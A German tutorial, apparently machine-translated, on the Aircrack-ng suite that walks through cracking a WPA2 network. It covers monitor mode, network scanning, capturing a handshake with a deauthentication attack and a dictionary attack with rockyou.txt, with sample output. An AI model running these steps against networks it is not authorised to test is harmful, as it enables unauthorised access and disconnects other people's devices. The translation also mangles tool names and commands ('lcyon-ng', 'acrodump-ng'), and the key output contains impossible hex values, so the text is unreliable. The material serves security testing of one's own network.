So verwenden Sie Flugzeugcrack-NG

So verwenden Sie Flugzeugcrack-NG
Die meiste Zeit denken die Menschen nie an das Netzwerk, mit dem sie verbunden sind. Sie denken nie, wie sicher dieses Netzwerk ist und wie sehr sie ihre vertraulichen Daten täglich riskieren. Sie können Schwachstellenprüfungen in Ihren WLAN -Netzwerken durchführen, indem Sie ein sehr leistungsstarkes Tool namens verwenden Aircrack-ng und Wireshark. Wireshark wird zur Überwachung der Netzwerkaktivität verwendet. Aircrack-ng ist eher ein aggressives Tool, mit dem Sie hacken und Zugriff auf drahtlose Verbindungen erhalten können. Als Eindringling zu denken war schon immer der sicherste Weg, sich vor einem Hack zu schützen. Möglicherweise können Sie die genauen Aktionen erfassen, die ein Eindringling ergreifen wird, um Zugriff auf Ihr System zu erhalten, indem Sie etwas über Flugzeuge kennenlernen. Sie können dann Konformitätsprüfungen in Ihrem eigenen System durchführen, um sicherzustellen, dass es nicht unsicher ist.

Aircrack-ng ist eine vollständige Reihe von Software zum Testen der WLAN -Netzwerksicherheit. Es ist nicht nur ein einzelnes Werkzeug, sondern eine Sammlung von Werkzeugen, von denen jede einen bestimmten Zweck ausführt. Verschiedene Bereiche der WLAN -Sicherheit können bearbeitet werden, z. Das Hauptziel des Flugzeugcracks ist es, die Pakete abzufangen und die Hashes zu entschlüsseln, um die Passwörter zu brechen. Es unterstützt fast alle neuen drahtlosen Schnittstellen. Aircrack-ng ist eine verbesserte Version eines veralteten Werkzeugsuite -Flugzeugs, Ng bezieht sich auf die Neue Generation. Einige der großartigen Tools, die zusammenarbeiten, um eine größere Aufgabe zu erledigen.

Luftmacht:

Airmon-NG ist im Aircrack-NG-Kit enthalten, mit dem die Netzwerkschnittstellenkarte im Monitor-Modus gelegt wird. Netzwerkkarten akzeptieren in der Regel nur Pakete, die auf sie abzielten, wie sie von der MAC-Adresse des NIC definiert sind. Bei Airmon-NG werden jedoch auch alle drahtlosen Pakete, unabhängig davon, ob sie darauf ausgerichtet sind oder nicht, auch akzeptiert werden. Sie sollten in der Lage sein, diese Pakete zu fangen, ohne mit dem Zugangspunkt zu verknüpfen oder zu authentifizieren. Es wird verwendet, um den Status eines Zugriffspunkts zu überprüfen, indem die Netzwerkschnittstelle in den Monitor -Modus gesetzt wird. Zuerst muss man die drahtlosen Karten konfigurieren, um den Monitormodus einzuschalten, und dann alle Hintergrundprozesse abzutöten, wenn Sie der Meinung sind, dass ein Prozess ihn stört. Nach der Beendigung der Prozesse kann der Monitor -Modus auf der drahtlosen Schnittstelle aktiviert werden, indem der folgende Befehl ausgeführt wird:

Ubuntu@Ubuntu: ~ $ sudo lcyon-ng starten wlan0 #

Sie können den Monitor-Modus auch deaktivieren, indem Sie den Airmon-NG jederzeit stoppen, indem Sie den folgenden Befehl verwenden:

Ubuntu@Ubuntu: ~ $ sudo lcingon-ng stoppen wlan0 #

Airodump-ng:

Airodump-ng wird verwendet, um alle uns umgebenden Netzwerke aufzulisten und wertvolle Informationen dazu anzuzeigen. Die grundlegende Funktionalität von Airodump-ng besteht darin, Pakete zu schnüffeln. Daher ist es im Wesentlichen programmiert, um alle Pakete um uns herum zu schnappen, während sie in den Monitor-Modus gesetzt werden. Wir werden es gegen alle Verbindungen um uns herum ausführen und Daten wie die Anzahl der mit dem Netzwerk verbundenen Clients, deren entsprechenden MAC -Adressen, Verschlüsselungsstil und Kanalnamen sammeln und anschließend auf unser Zielnetzwerk abzielen.

Indem wir den Befehl avoodump-ng eingeben und ihm den Namen Netzwerkschnittstellen als Parameter geben, können wir dieses Tool aktivieren. Es wird alle Zugriffspunkte, die Menge der Datenpakete, Verschlüsselungs- und Authentifizierungsmethoden sowie den Namen des Netzwerks (ESSID) aufgeführt. Aus Hacking -Sicht sind die MAC -Adressen die wichtigsten Felder.

Ubuntu@Ubuntu: ~ $ sudo acrodump-ng wlx0mon

Aircrack-Ng:

Flugzeugcrack wird zum Passwort -Knacken verwendet. Nachdem wir alle Pakete mit Airodump erfasst haben, können wir den Schlüssel mit dem Flugzeug knacken. Es knackt diese Schlüssel mit zwei Methoden PTW und FMS. Der PTW -Ansatz erfolgt in zwei Phasen. Zuerst werden nur die ARP -Pakete verwendet, und nur dann verwendet der Schlüssel nach der Suche nicht alle anderen erfassten Pakete. Ein Pluspunkt des PTW -Ansatzes ist, dass nicht alle Pakete für das Cracking verwendet werden. Im zweiten Ansatz, ich.e., FMS, wir verwenden sowohl die statistischen Modelle als auch die Brute -Force -Algen, um den Schlüssel zu knacken. Eine Wörterbuchmethode kann auch verwendet werden.

Aireplay-ng:

AirPlay-NG führt Pakete in ein drahtloses Netzwerk ein, um den Verkehr zu erstellen oder zu beschleunigen. Pakete aus zwei verschiedenen Quellen können von Aireplay-NG erfasst werden. Das erste ist das Live -Netzwerk, und das zweite sind die Pakete der bereits existierenden PCAP -Datei. AirPlay-NG ist bei einem Deauthentication-Angriff nützlich, der auf einen drahtlosen Zugriffspunkt und einen Benutzer abzielt. Darüber hinaus können Sie einige Angriffe wie Coffee Latte-Angriff mit AirPlay-NG ausführen, ein Tool, mit dem Sie einen Schlüssel aus dem Kundensystem erhalten können. Sie können dies erreichen, indem Sie ein ARP -Paket fangen und dann manipulieren und an das System zurücksenden. Der Kunde erstellt dann ein Paket, das von Airodumps erfasst werden kann, und Flugzeugrisse rissen den Schlüssel aus diesem modifizierten Paket. Einige andere Angriffsoptionen von AirPlay-NG sind Chopchop, Fragment sind Voraussetzungen usw.

Airbase-NG:

Airbase-NG wird verwendet, um den Computer eines Eindringlings in einen gefährdeten Verbindungspunkt zu verwandeln, mit dem andere verknüpft werden können. Mit Airbase-NG können Sie behaupten, ein rechtlicher Zugangspunkt zu sein und Man-in-the-Middle-Angriffe auf Computern durchzuführen, die an Ihr Netzwerk angeschlossen sind. Diese Art von Angriffen werden als böse Zwillingsangriffe bezeichnet. Es ist für grundlegende Benutzer unmöglich, zwischen einem rechtlichen Zugangspunkt und einem gefälschten Zugriffspunkt zu erkennen. Die böse Zwillingsbedrohung gehört also zu den bedrohlichsten drahtlosen Bedrohungen, denen wir heute ausgesetzt sind.

Airolib-ng:

Airolib beschleunigt den Hacking -Prozess durch Speichern und Verwalten der Kennwortlisten und des Zugriffspunkts. Das von diesem Programm verwendete Datenbankverwaltungssystem ist SQLite3, das hauptsächlich auf allen Plattformen verfügbar ist. Das Cracking des Kennworts enthält die Berechnung des paarweisen Hauptstartschlüssels, über die der private Transient -Schlüssel (PTK) extrahiert wird. Mit dem PTK können Sie den Frame Message Identification Code (MIC) für ein bestimmtes Paket bestimmen und das MIC theoretisch als ähnlich wie das Paket finden. Wenn die PTK richtig war, war auch das PMK richtig.

Um die in der Datenbank gespeicherten Kennwortlisten und Zugriffsnetzwerke anzuzeigen, geben Sie den folgenden Befehl ein:

Ubuntu@Ubuntu: ~ $ sudo airolib -ng testdatabase -stats

Hier testdatabase ist die DB, auf die Sie zugreifen oder erstellen möchten, und -stats ist die Operation, die Sie darauf ausführen möchten. Sie können mehrere Vorgänge auf den Datenbankfeldern durchführen, z. Geben Sie den folgenden Befehl ein, um Airolib-ng mit Aircrack-NG zu verwenden:

Ubuntu@Ubuntu: ~ $ sudo Aircrack -r testDatabase WPA2.eapol.Deckel

Hier verwenden wir die bereits berechneten PMKs, die in der gespeichert sind testdatabase zum Beschleunigen des Passwort-Cracking-Vorgangs.

Cracking WPA/WPA2 mit Aircrack-NG:

Schauen wir uns ein kleines Beispiel dafür an, was Aircrack-NG mit Hilfe einiger seiner großartigen Werkzeuge tun kann. Mit einer Wörterbuchmethode werden wir einen vorab der Wörterbuchmethode vorgefertigten WPA/WPA2-Netzwerk knacken.

Das erste, was wir tun müssen, ist, Netzwerkschnittstellen aufzulisten, die den Monitor -Modus unterstützen. Dies kann mit dem folgenden Befehl erfolgen:

Ubuntu@Ubuntu: ~ $ sudo aklamon-ng
Phy Interface -Treiber -Chipsatz
PHY0 WLX0 RTL8XXXU REALTEK SEMICONDUCTOR CORP.

Wir können eine Schnittstelle sehen; Jetzt müssen wir die von uns gefundene Netzwerkschnittstelle (WLX0) im Monitor -Modus mit dem folgenden Befehl einstellen:

Ubuntu@Ubuntu: ~ $ sudo lcyonm-ng starten wlx0

Der Monitor -Modus in der Schnittstelle wurde aufgerufen wlx0mon.

Jetzt sollten wir uns über unsere Netzwerkschnittstelle befinden, die wir im Monitor -Modus eingestellt haben.

Ubuntu@Ubuntu: ~ $ sudo acrodump-ng wlx0mon
CH 5] [Verstrichen: 30 s] [2020-12-02 00:17
BSSID PWR Beacons #data, #/s ch Mb Cipher Auth Essid
E4: 6F: 13: 04: CE: 31 -45 62 27 0 1 54E WPA2 CCMP PSK Crackit
C4: E9: 84: 76: 10: BE -63 77 0 0 6 54E. WPA2 CCMP PSK Hackme
C8: 3A: 35: A0: 4E: 01 -63 84 0 0 8 54E WPA2 CCMP PSK Net07
74: DA: 88: FA: 38: 02 -68 28 2 0 11 54E WPA2 CCMP PSK TP -Link_3802
BSSID Station PWR Rate Lost Frames Sonde
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -3 0 - 1E 8 5
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -33 1E- 6e 0 3
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -35 0 - 1 0 6
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -39 0E- 1 1002 13

Unser Zielnetzwerk ist Knacken In diesem Fall läuft derzeit auf Kanal 1.

Um das Kennwort des Zielnetzwerks zu knacken, müssen wir einen 4-Wege-Handschlag erfassen, der passiert, wenn ein Gerät versucht. Wir können es erfassen, indem wir den folgenden Befehl verwenden:

Ubuntu@Ubuntu: ~ $ sudo acrodump -ng -c 1 - -BSSID E4: 6F: 13: 04: CE: 31 -W /HOME WLX0

-C : Kanal

-BSSID: BSSID des Zielnetzwerks

-w : Der Name des Verzeichnisses, in dem die PCAP -Datei platziert wird

Jetzt müssen wir darauf warten, dass ein Gerät eine Verbindung zum Netzwerk herstellt, aber es gibt eine bessere Möglichkeit, einen Handschlag zu erfassen. Wir können die Geräte mit einem Deauthentication -Angriff unter Verwendung des folgenden Befehls auf den AP auf den AP deauthentifizieren:

Ubuntu@Ubuntu: ~ $ sudo Aireplay -Ng -0 -a E4: 6f: 13: 04: CE: 31

A: BSSID des Zielnetzwerks

-0: Deauthentication -Angriff

Wir haben alle Geräte getrennt, und jetzt müssen wir darauf warten, dass ein Gerät eine Verbindung zum Netzwerk herstellt.

CH 1] [Verstrichen: 30 S] [2020-12-02 00:02] [WPA Handshake: E4: 6F: 13: 04: CE: 31
BSSID PWR RXQ Beacons #Data, #/s ch Mb Cipher Auth e
E4: 6F: 13: 04: CE: 31 -47 1 228 807 36 1 54E WPA2 CCMP PSK P
BSSID Station PWR Rate Lost Frames Sonde
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -35 0 - 1 0 1
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -29 0E- 1E 0 22
E4: 6F: 13: 04: CE: 31 88: 28: B3: 30: 27: 7E -31 0E- 1 0 32
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -35 0E- 6e 263 708 Crackit
E4: 6F: 13: 04: CE: 31 D4: 6A: 6A: 99: ed: e3 -35 0e- 0e 0 86
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -37 0 - 1E 0 1

Wir haben einen Treffer bekommen und durch die obere rechte Ecke direkt neben der Zeit können wir sehen, dass ein Handschlag erfasst wurde. Schauen Sie nun den angegebenen Ordner an (( /heim in unserem Fall) für eine “.PCAP" Datei.

Um den WPA -Schlüssel zu knacken, können wir den folgenden Befehl verwenden:

Ubuntu@Ubuntu: ~ $ sudo Aircrack -A2 -W Rockyou.TXT -B E4: 6F: 13: 04: CE: 31 Handshake.Deckel
B: BSSID des Zielnetzwerks
-A2: WPA2 -Modus
Rockyou.TXT: Die verwendete Wörterbuchdatei
Handschlag.KAPE: Die Datei, die erfasstes Handschlag enthält
Aircrack-Ng 1.2 Beta3
[00:01:49] 10566 getestete Keys (1017.96 K/s)
SCHLÜSSEL GEFUNDEN! [ Du hast mich ]
Hauptschlüssel: 8d EC 0c EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6d
0c 06 08 Ed BC 6B H7 J8 K1 A0 89 6B 7B B F7 6f 50 C
Transientenschlüssel: 4d C4 5R 6t 76 99 6G 7H 8d EC
H7 J8 K1 A0 89 6B 7B 6d AF 5B 8d 2d A0 89 6b
A5 BD K1 A0 89 6B 0c 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
8d EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
MAC: CB 5A F8 CE 62 B2 1B F7 6f 50 C0 25 62 E9 5d 71

Der Schlüssel zu unserem Zielnetzwerk wurde erfolgreich geknackt.

Abschluss:

Die drahtlosen Netzwerke werden überall von jedem Unternehmen verwendet, von Arbeitnehmern, die Smartphones bis hin zu Industriekontrollgeräten verwenden. Laut Untersuchungen werden fast 50 Prozent des Internetverkehrs im Jahr 2021 über WLAN übertragen. Wireless Networks haben viele Vorteile, Kommunikation außerhalb der Türen, einen schnellen Internetzugang an Orten, an denen es fast unmöglich ist, Drähte zu verlegen, das Netzwerk zu erweitern, ohne Kabel für jeden anderen Benutzer zu installieren, und können Ihre Mobilgeräte problemlos an Ihre Heimbüros verbinden, während Sie Aren sind 'T da.

Trotz dieser Vorteile gibt es ein großes Fragezeichen für Ihre Privatsphäre und Sicherheit. Als diese Netzwerke; Innerhalb des Sendungsbereichs der Router sind für alle offen, sie können leicht angegriffen werden und Ihre Daten können leicht beeinträchtigt werden. Wenn Sie beispielsweise mit einem öffentlichen WLAN verbunden sind, kann jeder, der mit diesem Netzwerk verbunden ist.